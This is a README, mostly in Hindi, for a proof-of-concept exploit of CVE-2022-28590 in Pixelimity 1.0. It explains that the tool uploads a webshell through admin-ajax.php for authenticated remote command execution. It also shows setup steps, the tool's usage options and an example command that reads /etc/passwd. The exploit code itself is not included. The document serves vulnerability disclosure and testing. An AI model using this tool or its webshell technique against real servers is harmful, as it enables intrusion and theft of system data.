
CVE-2022-28590 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Pixelimity 1.0 में एक रिमोट कोड एक्सीक्यूशन भेद्यता। प्रमाणित कमांड निष्पादन के लिए admin-ajax.php के माध्यम से एक वेबशेल अपलोड करता है।
मूल खोज और मैन्युअल PoC tuando243 से है:
Pixelimity 1.0 में admin/admin-ajax.php?action=install_theme के माध्यम से एक रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता मौजूद है।
यह PoC आगे रिमोट कोड निष्पादन के लिए एक सरल वेबशेल अपलोड करता है। यह एक्सप्लॉइट उम्मीद करता है कि सर्वर पर system() फ़ंक्शन अनुमत है, अन्यथा यह पता लगाने के लिए कि कौन सा फ़ंक्शन system के अलावा निष्पादन की अनुमति देता है, कुछ पूर्व टोही करनी होगी।
git clone https://github.com/jcarabantes/CVE-2022-28590.git
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2022-28590.py -h
python CVE-2022-28590.py -h
___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ ( _ )| __)/ _ \ / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ / _ \|__ \_ /( (_) )
\___) \/ (____) (____)\___/(____)(____) (____)\___/(___/ (_/ \___/
Vulnerability discovered by tuando243
PoC author: @javicarabantes
usage: CVE-2022-28590.py [-h] [-d] [-q] --url URL --user USER [--password PASSWORD] [-c COMMAND]
optional arguments:
-h, --help show this help message and exit
-d Debug output
-q Do not print the banner
--url URL url: https://server:8081/
--user USER admin user
--password PASSWORD admin password
-c COMMAND Command to execute. Default: id
python CVE-2022-28590.py --url http://localhost:8082 --user myuser -c "cat /etc/passwd"
